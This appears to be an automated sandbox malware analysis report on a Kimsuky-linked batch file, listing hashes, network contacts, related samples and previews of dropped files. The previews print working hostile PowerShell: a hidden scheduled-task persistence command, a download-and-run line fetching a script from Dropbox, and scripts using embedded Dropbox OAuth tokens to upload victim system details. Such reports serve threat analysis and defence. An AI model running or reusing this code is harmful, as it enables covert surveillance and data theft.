https://dl.dropboxusercontent.com | powershell.exe, 00000002.00000002.1821493344.000002C3DAEBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836552794.0000019FBB061000.00000004.00000800.00020000.00000000.sdmp | false | - | high
IP | Domain | Country | ASN | ASN Name | Malicious
162.125.65.15 | edge-block-www-env.dropbox-dns.com | United States | 19679 | DROPBOXUS | false
162.125.69.19 | api-env.dropbox-dns.com | United States | 19679 | DROPBOXUS | false
162.125.69.14 | edge-block-api-env.dropbox-dns.com | United States | 19679 | DROPBOXUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1563601
Start date and time: 2024-11-27 08:28:05 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 51s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: pay.bat
Detection: MAL
Classification: mal96.troj.evad.winBAT@6/14@3/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 63%
• Number of executed functions: 13
• Number of non-executed functions: 6
Cookbook Comments:
• Found application associated with file extension: .bat
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtCreateKey calls found.
Time | Type | Description
02:28:58 | API Interceptor | 87x Sleep call for process: powershell.exe modified
07:29:02 | Task Scheduler | Run new task: ChromeUpdateTaskMachine path: PowerShell.exe s>-WindowStyle Hidden -nop -NonInteractive -NoProfile -ExecutionPolicy Bypass -Command "& {$abc = Join-Path ($env:AppData) \"chrome.ps1\"; & $abc;}"
Match | Associated Sample Name / URL | Detection | Threat Name
162.125.65.15 | protected.ps1 | malicious | Unknown
162.125.65.15 | https://www.dropbox.com/l/AADw7QsXXUEgtGMTkaD6s_noiLvCBcZslDg/downloading | malicious | Unknown
162.125.65.15 | 35N4PXWcmC.msi | malicious | Unknown
162.125.69.19 | offices.ini.dll | malicious | Unknown
162.125.69.14 | bshS53Wc.posh.ps1 | malicious | Unknown
162.125.69.14 | offices.ini.dll | malicious | Unknown
Match | Associated Sample Name / URL | Detection | Threat Name | Context
edge-block-api-env.dropbox-dns.com | SfXgy8lFUR.lnk | malicious | Unknown | 162.125.66.14
edge-block-api-env.dropbox-dns.com | E78jryaJ.posh.ps1 | malicious | PoshC2 | 162.125.66.14
edge-block-api-env.dropbox-dns.com | RBmbghu3.posh.ps1 | malicious | PoshC2 | 162.125.66.14
edge-block-api-env.dropbox-dns.com | F1ycmYA3.posh.ps1 | malicious | PoshC2 | 162.125.66.14
edge-block-api-env.dropbox-dns.com | WAJWF4NS.posh.ps1 | malicious | PoshC2 | 162.125.66.14
edge-block-api-env.dropbox-dns.com | jVeXCTvr.posh.ps1 | malicious | PoshC2 | 162.125.66.14
edge-block-api-env.dropbox-dns.com | WK6RB9ih.posh.ps1 | malicious | PoshC2 | 162.125.2.14
edge-block-api-env.dropbox-dns.com | nzbQP3Dd.posh.ps1 | malicious | PoshC2 |
                                                                                                                          • 162.125.2.14
                                                                                                                          unpacked.exeGet hashmaliciousROKRATBrowse
                                                                                                                          • 162.125.4.14
                                                                                                                          11111.lnkGet hashmaliciousUnknownBrowse
                                                                                                                          • 162.125.6.14
                                                                                                                          edge-block-www-env.dropbox-dns.comhttps://dl.dropboxusercontent.com/scl/fi/zwwtq189ncebo2kcft2qa/Nulo-PPC-Tracking-Report-2025.zip?rlkey=lvid9bjy47pkluerl2jbf5wun&st=bhhac8iv&dl=0Get hashmaliciousUnknownBrowse
                                                                                                                          • 162.125.69.15
                                                                                                                          20mktbose2.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                          • 162.125.69.15
                                                                                                                          2024_11_11_Product advertising hotpoint.pdf.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                                                                          • 162.125.66.15
                                                                                                                          hnl2bose13.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                          • 162.125.66.15
                                                                                                                          2h2xLB9h1L.lnkGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                          • 162.125.66.15
                                                                                                                          13jhsfbose.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                          • 162.125.66.15
                                                                                                                          scut18bo03.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                          • 162.125.66.15
                                                                                                                          bose2scut18.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                          • 162.125.66.15
                                                                                                                          18cut04.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                          • 162.125.66.15
                                                                                                                          bose1511mkt.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                          • 162.125.66.15
                                                                                                                          api-env.dropbox-dns.comdropbox.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 162.125.66.19
                                                                                                                          dropbox.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 162.125.66.19
                                                                                                                          SfXgy8lFUR.lnkGet hashmaliciousUnknownBrowse
                                                                                                                          • 162.125.66.14
                                                                                                                          E78jryaJ.posh.ps1Get hashmaliciousPoshC2Browse
                                                                                                                          • 162.125.66.14
                                                                                                                          RBmbghu3.posh.ps1Get hashmaliciousPoshC2Browse
                                                                                                                          • 162.125.66.14
                                                                                                                          F1ycmYA3.posh.ps1Get hashmaliciousPoshC2Browse
                                                                                                                          • 162.125.66.14
                                                                                                                          WAJWF4NS.posh.ps1Get hashmaliciousPoshC2Browse
                                                                                                                          • 162.125.66.14
                                                                                                                          jVeXCTvr.posh.ps1Get hashmaliciousPoshC2Browse
                                                                                                                          • 162.125.66.14
                                                                                                                          WK6RB9ih.posh.ps1Get hashmaliciousPoshC2Browse
                                                                                                                          • 162.125.2.14
                                                                                                                          nzbQP3Dd.posh.ps1Get hashmaliciousPoshC2Browse
                                                                                                                          • 162.125.2.14
                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          DROPBOXUShttps://docsend.com/view/ygpcsdciay42c22xGet hashmaliciousUnknownBrowse
                                                                                                                          • 162.125.1.20
                                                                                                                          https://dl.dropboxusercontent.com/scl/fi/zwwtq189ncebo2kcft2qa/Nulo-PPC-Tracking-Report-2025.zip?rlkey=lvid9bjy47pkluerl2jbf5wun&st=bhhac8iv&dl=0Get hashmaliciousUnknownBrowse
                                                                                                                          • 162.125.69.15
                                                                                                                          20mktbose2.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                          • 162.125.69.18
                                                                                                                          20bosemkt.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                          • 162.125.65.18
                                                                                                                          2024_11_11_Product advertising hotpoint.pdf.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                                                                          • 162.125.66.15
                                                                                                                          https://www.dropbox.com/l/scl/AACfaxhMBCajpVJfxiny0jrZK6hv1s8xd2MGet hashmaliciousUnknownBrowse
                                                                                                                          • 162.125.1.20
                                                                                                                          bose18mkt.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                          • 162.125.66.18
                                                                                                                          hnbose1711.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                          • 162.125.66.18
                                                                                                                          hnl2bose13.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                          • 162.125.66.18
                                                                                                                          2h2xLB9h1L.lnkGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                          • 162.125.66.18
                                                                                                                          DROPBOXUShttps://docsend.com/view/ygpcsdciay42c22xGet hashmaliciousUnknownBrowse
                                                                                                                          • 162.125.1.20
                                                                                                                          https://dl.dropboxusercontent.com/scl/fi/zwwtq189ncebo2kcft2qa/Nulo-PPC-Tracking-Report-2025.zip?rlkey=lvid9bjy47pkluerl2jbf5wun&st=bhhac8iv&dl=0Get hashmaliciousUnknownBrowse
                                                                                                                          • 162.125.69.15
                                                                                                                          20mktbose2.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                          • 162.125.69.18
                                                                                                                          20bosemkt.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                          • 162.125.65.18
                                                                                                                          2024_11_11_Product advertising hotpoint.pdf.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                                                                          • 162.125.66.15
                                                                                                                          https://www.dropbox.com/l/scl/AACfaxhMBCajpVJfxiny0jrZK6hv1s8xd2MGet hashmaliciousUnknownBrowse
                                                                                                                          • 162.125.1.20
                                                                                                                          bose18mkt.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                          • 162.125.66.18
                                                                                                                          hnbose1711.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                          • 162.125.66.18
                                                                                                                          hnl2bose13.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                          • 162.125.66.18
                                                                                                                          2h2xLB9h1L.lnkGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                          • 162.125.66.18
                                                                                                                          DROPBOXUShttps://docsend.com/view/ygpcsdciay42c22xGet hashmaliciousUnknownBrowse
                                                                                                                          • 162.125.1.20
                                                                                                                          https://dl.dropboxusercontent.com/scl/fi/zwwtq189ncebo2kcft2qa/Nulo-PPC-Tracking-Report-2025.zip?rlkey=lvid9bjy47pkluerl2jbf5wun&st=bhhac8iv&dl=0Get hashmaliciousUnknownBrowse
                                                                                                                          • 162.125.69.15
                                                                                                                          20mktbose2.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                          • 162.125.69.18
                                                                                                                          20bosemkt.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                          • 162.125.65.18
                                                                                                                          2024_11_11_Product advertising hotpoint.pdf.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                                                                          • 162.125.66.15
                                                                                                                          https://www.dropbox.com/l/scl/AACfaxhMBCajpVJfxiny0jrZK6hv1s8xd2MGet hashmaliciousUnknownBrowse
                                                                                                                          • 162.125.1.20
                                                                                                                          bose18mkt.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                          • 162.125.66.18
                                                                                                                          hnbose1711.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                          • 162.125.66.18
                                                                                                                          hnl2bose13.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                          • 162.125.66.18
                                                                                                                          2h2xLB9h1L.lnkGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                          • 162.125.66.18
                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                          • 162.125.69.14
                                                                                                                          • 162.125.65.15
                                                                                                                          • 162.125.69.19
                                                                                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                          • 162.125.69.14
                                                                                                                          • 162.125.65.15
                                                                                                                          • 162.125.69.19
                                                                                                                          Po-5865A.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 162.125.69.14
                                                                                                                          • 162.125.65.15
                                                                                                                          • 162.125.69.19
                                                                                                                          https://www.gogetsy.com/downloads/eyJmaWxlX2lkIjoiMTIwMDY1NzY3MjE3NSIsInRyYW5zYWN0aW9uX2lkIjoiMzgyNDQ4NTYwOSIsImV2ZW50IjoiZG93bmxvYWQiLCJub25jZSI6IjY3M2NlODI0MTU2ZGQ2NzNjZTgyNDE1NmRmNjczY2U4MjQxNTZlMDY3M2NlODI0MTU2ZTEiLCJ0aW1lc3RhbXAiOjE3MzIwNDQ4MzZ9/0ff3c9f2d9eae28f5e9880589ecb55882049889393d1e096fca15f339c17e418Get hashmaliciousUnknownBrowse
                                                                                                                          • 162.125.69.14
                                                                                                                          • 162.125.65.15
                                                                                                                          • 162.125.69.19
                                                                                                                          ZipRipper.cmdGet hashmaliciousUnknownBrowse
                                                                                                                          • 162.125.69.14
                                                                                                                          • 162.125.65.15
                                                                                                                          • 162.125.69.19
                                                                                                                          CUVAs_ Closing Doc_ The Abram Law Group #RDZ-01.emlGet hashmaliciousCredentialStealer, HTMLPhisherBrowse
                                                                                                                          • 162.125.69.14
                                                                                                                          • 162.125.65.15
                                                                                                                          • 162.125.69.19
                                                                                                                          z51awb_shipping.cmdGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                          • 162.125.69.14
                                                                                                                          • 162.125.65.15
                                                                                                                          • 162.125.69.19
                                                                                                                          http://www.trilogyrez.comGet hashmaliciousUnknownBrowse
                                                                                                                          • 162.125.69.14
                                                                                                                          • 162.125.65.15
                                                                                                                          • 162.125.69.19
                                                                                                                          DOCUMENTS, COI - Trilogy Investment Company.emlGet hashmaliciousCredentialStealerBrowse
                                                                                                                          • 162.125.69.14
                                                                                                                          • 162.125.65.15
                                                                                                                          • 162.125.69.19
                                                                                                                          z705688y7t7tgggju97867756576.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 162.125.69.14
                                                                                                                          • 162.125.65.15
                                                                                                                          • 162.125.69.19
                                                                                                                          No context
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 1836
Entropy (8bit): 5.693190364233567
Encrypted: false
SSDEEP: 48:YSU4Yymdax4RIoUP7m9qr9trBLNGIy+ffi589qyZ3DVww:pHYv+IfB9qrPBRGIyMKMqy1DVww
MD5: F7D00C2DC2EA606C9A2E4AA30F4EE346
SHA1: 7F0CC6E0BB56772C9A653224F4FB22EF9FC4CC82
SHA-256: 3A99F0EDFCDD3D0CEFF3C7203674FFD8709D9AA35F1F3F9FE27564390DB2307D
SHA-512: 5E4A83D4E8D8947E5C1CEFC8E900587F870A05FFCD339BB1CD17DF9BBE16B785D99ADBEBC88FE746DA8699DBDC529735E57BC56C0BCEF952363F7C2F8F82728F
Malicious: false
Reputation: low
                                                                                                                          Preview:@...e...........^....................................@..........@...............M6.]..O....PI.&........System.Web.Extensions...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.................0..~.J.R...L........System.Data.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P................1]...E...........(.Microsoft.PowerShell.Commands.Management
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Reputation: high, very likely benign file
Preview: # PowerShell test file to determine AppLocker lockdown mode
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):49412
                                                                                                                          Entropy (8bit):2.285655614929122
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:0po7vWIl+iABdGcQ+UnXCVcZjz9b65jJvd6FHi8kHZiSGQMUsoDbq4vV:0psWLiA7GcQ+UXC2Qd/soDbq49
                                                                                                                          MD5:BA66C392B130D13BA2D0E0D80C8BE955
                                                                                                                          SHA1:5C69EB22FDDD26149A3FE33D5E6B18D960765477
                                                                                                                          SHA-256:A3A294AA7D83CC1B8C1BEC9EE38EBA5ABA5FC29810196DDFBAA928E3DC20742A
                                                                                                                          SHA-512:1CD20FB36FA5723009D9D43C7FB978A8E66C7AE4D4ABD36ABFFFC7C6DC051579AA4F7F37FFCAC4CB9F7C128CC02FC791C5491F72FD672384475266DE952ACBEA
                                                                                                                          Malicious:false
                                                                                                                          Preview:......S.u.n.d.a.y.,. .S.e.p.t.e.m.b.e.r. .2.4.,. .2.0.2.3. .8.:.0.0.:.0.3. .A.M.................C.a.p.t.i.o.n. . . . . . . . . . . . . . . . . . .V.e.r.s.i.o.n. . . . .B.u.i.l.d.N.u.m.b.e.r. .O.S.A.r.c.h.i.t.e.c.t.u.r.e.....-.-.-.-.-.-.-. . . . . . . . . . . . . . . . . . .-.-.-.-.-.-.-. . . . .-.-.-.-.-.-.-.-.-.-.-. .-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.i.c.r.o.s.o.f.t. .W.i.n.d.o.w.s. .1.0. .P.r.o. .1.0...0...1.9.0.4.5. .1.9.0.4.5. . . . . . . .6.4.-.b.i.t. . . . . . . . .....................D.o.m.a.i.n. . . . . . . . . . . . . . .:. .X.B.r.l.w.....M.a.n.u.f.a.c.t.u.r.e.r. . . . . . . . .:. .m.P.P.z.R.h.Z.z.f.r.P.P.s.e.h.....M.o.d.e.l. . . . . . . . . . . . . . . .:. .o.S.Y. .t.1.T.2.....N.a.m.e. . . . . . . . . . . . . . . . .:. .J.O.N.E.S.-.P.C.....P.r.i.m.a.r.y.O.w.n.e.r.N.a.m.e. . . . .:. .h.a.r.d.z.....T.o.t.a.l.P.h.y.s.i.c.a.l.M.e.m.o.r.y. .:. .4.2.9.3.9.7.1.9.6.8.................D.e.s.k.....W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.....2.0.2.3.1.0.0.3.0.9.5.7.1.8...0.0.0.0.0.0.+.0.6.0.....
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):14
                                                                                                                          Entropy (8bit):2.699513850319966
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:QdLTlil:Qh0
                                                                                                                          MD5:3D8CB1C7FD8A50C3ED6CB72ADCD719C4
                                                                                                                          SHA1:3ADE5C433A3AC215C8F613D983D1FB6616A9F5F6
                                                                                                                          SHA-256:CF1F286FF279CF983EBFA07381CAA7206D561D864A8C863050159E2DDF29A95F
                                                                                                                          SHA-512:1928304B53AB8EEDF7BEC699AABE01799353E7F693C3891A7A52A5FB0226C9006A329389072F297565A6B76ACFF523C9B2832A0B2285862C7564F9FC7098545C
                                                                                                                          Malicious:false
                                                                                                                          Preview:..x.m.i.l.....
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):239
                                                                                                                          Entropy (8bit):5.322976015897835
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:jmWZighVTVcINFGYwXPPveU1vtel57BVO:SeRhVhRFGYw3WU1UTO
                                                                                                                          MD5:79EBFBF4D4F200563FE4700F3DF89A8C
                                                                                                                          SHA1:07224226E4DFBA4C7E4ED7FBCDF7BDC866BE4C91
                                                                                                                          SHA-256:F8EF63C2D7067BECC210638B175EB513501EABD21E36F79536FACA9B93A2C3A1
                                                                                                                          SHA-512:9095A82A1022CA0982C16030B7E2F4AEEAD0930EA6A5449BDCA698B9FACBBDC478E60B80BCF19231DDBB960FCFA9C5A4429F2D06535536D0AA7109CF16E39CB0
                                                                                                                          Malicious:false
                                                                                                                          Preview:.$aaa = Join-Path ($env:AppData) "temp.ps1"; wget -Uri "https://dl.dropboxusercontent.com/scl/fi/dkuamlrlsrbygso1swn8p/santa2-f.txt?rlkey=r8fe0viier1mwv9azk5awy5s9&st=yvqqfdfy&dl=0" -OutFile $aaa; & $aaa; Remove-Item -Path $aaa -Force;..
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1532
                                                                                                                          Entropy (8bit):5.325750061933784
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:wgAyHnImia7udCYklujz3dXcbbA7xGtP7Uq6Pa7r7qLsHxXe1NruNKOfvIPysYQ9:QYnIF5dCYkAjzNxlsU9aX7CKxXe1I9vk
                                                                                                                          MD5:E598DB51DDEE48B7C351B68AEBF76EBF
                                                                                                                          SHA1:60CDEDB45513069A5D67310529966681BD0B4663
                                                                                                                          SHA-256:ED55BB081D0E4DFEEFD7AF35DBB0A0481BE192D3D0759631C951F7D6D5737749
                                                                                                                          SHA-512:3F513C736DF8D91529AA9C6BF52846B2CF985922D2FF1E7C6CF7759CBC27942FB0A20093C2483A1087890D23EC368CE3AAC0C2AAED3A57A621266BE7CC5BE7EB
                                                                                                                          Malicious:true
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: JoeSecurity_Kimsuky_9, Description: Yara detected Kimsuky, Source: C:\Users\user\AppData\Roaming\system_first.ps1, Author: Joe Security
                                                                                                                          Preview:$ttttttttttttttttttttttpppppppppppppppppppp = $env:AppData;....$tokenRequestParams = @{.. grant_type = "refresh_token".. refresh_token = "CxR76FAp2JAAAAAAAAAAAYc-Z6EEUm1sCkInZnCsHRQKCp5lOSKBMipCEudngc-l";.. client_id = "8azqsrgxsd8fwrg".. client_secret = "jjaqv85bmknr7st"..}..$qwa = "https://a" + "pi.dr" + "opboxa" + "pi.com/oau" + "th2/to" + "ken"..$myttto = Invoke-RestMethod -Uri $qwa -Method Post -Body $tokenRequestParams......$ipAddress = (Get-WmiObject Win32_NetworkAdapterConfiguration | Where-Object { $_.IPAddress -ne $null }).IPAddress[0]..$currentTime = Get-Date -Format "MMdd_HHmm"....$fileName = "$ipAddress-$currentTime-XXX-santa2.txt"....$srcPath = Join-Path $ttttttttttttttttttttttpppppppppppppppppppp $fileName...."xmil" | Out-File -FilePath $srcPath......$outputFile = Split-Path $srcPath -leaf..$tttttffffppp="/githut/santa2_persist/$outputFile"..$arg = '{ "path": "' + $tttttffffppp + '", "mode": "add", "autorename": true, "mute": false }'..$authorization
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2318
                                                                                                                          Entropy (8bit):5.321570825661366
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:/YnIF5dCYkAjzNxlsL9taD9EDM9amaDWGa5iaL+iawsa9da27CEXe1I9vm8EZ:wnIF5dCYkAnmL9taD9DamaDWGakaLJaT
                                                                                                                          MD5:53029E897CBE2F8BBFEE935EB4C7AFD5
                                                                                                                          SHA1:491A79439625737B02B0471BF32E750EB8907469
                                                                                                                          SHA-256:F9260AE2FB93C9E1FD6A08EE65641F34B059026700DF953796ADDEFD37DC3969
                                                                                                                          SHA-512:2298D9F2AFBE807BECE37C20BD81F695B37567969CAA75343D7C3D3F5AB2A6A30789399767944443193A4E291FE36D6815D95E340DC8ADCE35B01C3594262F22
                                                                                                                          Malicious:true
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: JoeSecurity_Kimsuky_9, Description: Yara detected Kimsuky, Source: C:\Users\user\AppData\Roaming\temp.ps1, Author: Joe Security
Preview: ..$ttttttttttttttttttttttpppppppppppppppppppp = $env:AppData;....$tokenRequestParams = @{.. grant_type = "refresh_token".. refresh_token = "CxR76FAp2JAAAAAAAAAAAYc-Z6EEUm1sCkInZnCsHRQKCp5lOSKBMipCEudngc-l";.. client_id = "8azqsrgxsd8fwrg".. client_secret = "jjaqv85bmknr7st"..}..$qwa = "https://a" + "pi.dr" + "opboxa" + "pi.com/oau" + "th2/to" + "ken"..$myttto = Invoke-RestMethod -Uri $qwa -Method Post -Body $tokenRequestParams......$ipAddress = (Get-WmiObject Win32_NetworkAdapterConfiguration | Where-Object { $_.IPAddress -ne $null }).IPAddress[0]..$currentTime = Get-Date -Format "MMdd_HHmm"..$fileName = "$ipAddress-$currentTime-RRR-santa2.txt"..$srcPath = Join-Path $ttttttttttttttttttttttpppppppppppppppppppp $fileName..(Get-CimInstance Win32_OperatingSystem).LastBootUpTime | Out-File -FilePath $srcPath..(Get-CimInstance Win32_OperatingSystem | Select-Object Caption, Version, BuildNumber, OSArchitecture) | Out-File -FilePath $srcPath -Append.. Get-WmiObject -Class W
File type: DOS batch file, ASCII text, with very long lines (1674), with CRLF line terminators
Entropy (8bit): 5.928714451182084
TrID:
File name: pay.bat
File size: 1'687 bytes
MD5: b262ac518c0114f414aaedbb4ef7c728
SHA1: fd02470c6cc4ceb5fad3589d02e5148a8c738b83
SHA256: 8e0eb0d36bfd4e28ec6a10acccf899740df7048451229b84715e475e3c91347b
SHA512: 52da05952a4749d42cbcea8eac97d897ecb7e98cc0c7ce686fa86194b312de8d1f9c64580b3a8deb0cf5c7953651927d7a26bfbcbaa8db825cdda9f3a1507e21
SSDEEP: 48:sLH6+590/x5NtibxMDIKQ858Ff92B6sNY1cOU:A0/Wx0ZQ858FRfcL
TLSH: 3531B84856FA33159DA7DC917254C696232630B6147B1EACC347E5F45FC0135F0697CB
File Content Preview: @echo off..powershell/W 1 -ep bypass -w hidden -command $cmkGnaBV=[Convert]::FromBase64String('JHBwcCA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAiY2hyb21lLnBzMSI7ICRzdHIgPSAnJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAidGVtcC5wczEiOyB3Z2V0IC1VcmkgImh0dHBzOi8vZGwu
Icon Hash: 9686878b929a9886
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 27, 2024 08:29:02.633502007 CET | 49730 | 443 | 192.168.2.4 | 162.125.65.15
Nov 27, 2024 08:29:02.633568048 CET | 443 | 49730 | 162.125.65.15 | 192.168.2.4
Nov 27, 2024 08:29:02.637326956 CET | 49730 | 443 | 192.168.2.4 | 162.125.65.15
Nov 27, 2024 08:29:02.661356926 CET | 49730 | 443 | 192.168.2.4 | 162.125.65.15
Nov 27, 2024 08:29:02.661387920 CET | 443 | 49730 | 162.125.65.15 | 192.168.2.4
Nov 27, 2024 08:29:03.680998087 CET | 49731 | 443 | 192.168.2.4 | 162.125.65.15
Nov 27, 2024 08:29:03.681057930 CET | 443 | 49731 | 162.125.65.15 | 192.168.2.4
Nov 27, 2024 08:29:03.681122065 CET | 49731 | 443 | 192.168.2.4 | 162.125.65.15
Nov 27, 2024 08:29:03.684632063 CET | 49731 | 443 | 192.168.2.4 | 162.125.65.15
Nov 27, 2024 08:29:03.684650898 CET | 443 | 49731 | 162.125.65.15 | 192.168.2.4
Nov 27, 2024 08:29:04.028240919 CET | 443 | 49730 | 162.125.65.15 | 192.168.2.4
Nov 27, 2024 08:29:04.028316975 CET | 49730 | 443 | 192.168.2.4 | 162.125.65.15
Nov 27, 2024 08:29:04.028352022 CET | 443 | 49730 | 162.125.65.15 | 192.168.2.4
Nov 27, 2024 08:29:04.028389931 CET | 49730 | 443 | 192.168.2.4 | 162.125.65.15
Nov 27, 2024 08:29:04.033493042 CET | 49730 | 443 | 192.168.2.4 | 162.125.65.15
Nov 27, 2024 08:29:04.033504009 CET | 443 | 49730 | 162.125.65.15 | 192.168.2.4
Nov 27, 2024 08:29:04.033781052 CET | 443 | 49730 | 162.125.65.15 | 192.168.2.4
Nov 27, 2024 08:29:04.045469999 CET | 49730 | 443 | 192.168.2.4 | 162.125.65.15
Nov 27, 2024 08:29:04.087347984 CET | 443 | 49730 | 162.125.65.15 | 192.168.2.4
Nov 27, 2024 08:29:05.046049118 CET | 443 | 49731 | 162.125.65.15 | 192.168.2.4
Nov 27, 2024 08:29:05.049294949 CET | 49731 | 443 | 192.168.2.4 | 162.125.65.15
Nov 27, 2024 08:29:05.049333096 CET | 443 | 49731 | 162.125.65.15 | 192.168.2.4
Nov 27, 2024 08:29:05.057290077 CET | 49731 | 443 | 192.168.2.4 | 162.125.65.15
Nov 27, 2024 08:29:05.116759062 CET | 49731 | 443 | 192.168.2.4 | 162.125.65.15
Nov 27, 2024 08:29:05.116815090 CET | 443 | 49731 | 162.125.65.15 | 192.168.2.4
Nov 27, 2024 08:29:05.117187977 CET | 443 | 49731 | 162.125.65.15 | 192.168.2.4
Nov 27, 2024 08:29:05.161302090 CET | 49731 | 443 | 192.168.2.4 | 162.125.65.15
Nov 27, 2024 08:29:05.229808092 CET | 443 | 49730 | 162.125.65.15 | 192.168.2.4
Nov 27, 2024 08:29:05.229830027 CET | 443 | 49730 | 162.125.65.15 | 192.168.2.4
Nov 27, 2024 08:29:05.229899883 CET | 49730 | 443 | 192.168.2.4 | 162.125.65.15
